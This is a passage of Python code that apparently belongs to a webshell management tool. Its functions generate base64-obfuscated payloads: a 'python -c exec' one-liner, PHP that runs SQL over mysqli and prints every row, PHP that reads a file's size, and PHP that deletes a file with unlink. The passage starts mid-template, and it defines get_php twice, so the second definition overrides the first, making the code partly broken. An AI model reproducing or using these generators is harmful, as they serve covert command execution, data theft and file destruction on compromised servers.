Agent($REQUEST_URL,$REQUEST_METHOD,$REQUEST_REDIRECT_METHOD,$REDIRECT_AUTO,$REDIRECT_COOKIE_USE,$REQUEST_PARAMS,$REQUEST_DATA,$REQUEST_COOKIE,$TIMEOUT,$TYPE); echo $this_request; """ % (request_target, request_method, request_redirect_method, request_data, request_params, request_cookie, redirect_auto, redirect_cookie_use, timeout, type))
def oneline_python(code: str):
    """Wrap *code* in a single ``python -c`` command line.

    The source is base64-encoded so it survives quoting; the generated
    command decodes it with the ``base64`` module and passes it to ``exec``.
    """
    encoded_source = base64_encode(code)
    template = '''python -c "exec(\\"exec(__import__('base64').b64decode('%s'.encode()).decode())\\")"'''
    return template % encoded_source
def get_php(command, database):
    """Return the PHP text that runs one SQL statement over mysqli.

    The connection code comes from ``get_connect_code(dbname=database)`` and
    the statement travels base64-encoded.  The emitted output is one line of
    column names followed by one line per row, every field terminated by
    ``*,``.
    """
    connection_php = get_connect_code(dbname=database)
    encoded_sql = base64_encode(command)
    template = """%s $r=$con->query(base64_decode('%s')); $rows=$r->fetch_all(MYSQLI_ASSOC); foreach($rows[0] as $k=>$v){ echo "$k*,"; } echo "\\n"; foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}"""
    return template % (connection_php, encoded_sql)
def get_filesize_php(web_file_path: str):
    """Return the PHP text that echoes the size of *web_file_path*.

    The path travels base64-encoded and is decoded on the PHP side.
    """
    encoded_target = base64_encode(web_file_path)
    template = """echo filesize(base64_decode("%s")); """
    return template % (encoded_target)
def get_php(web_file_path):
    """Return the PHP text that deletes *web_file_path*.

    The PHP echoes 'success' when unlink() reports success and nothing
    otherwise.  The path travels base64-encoded.
    """
    encoded_target = base64_encode(web_file_path)
    template = """if(unlink(base64_decode("%s"))){echo 'success';}"""
    return template % encoded_target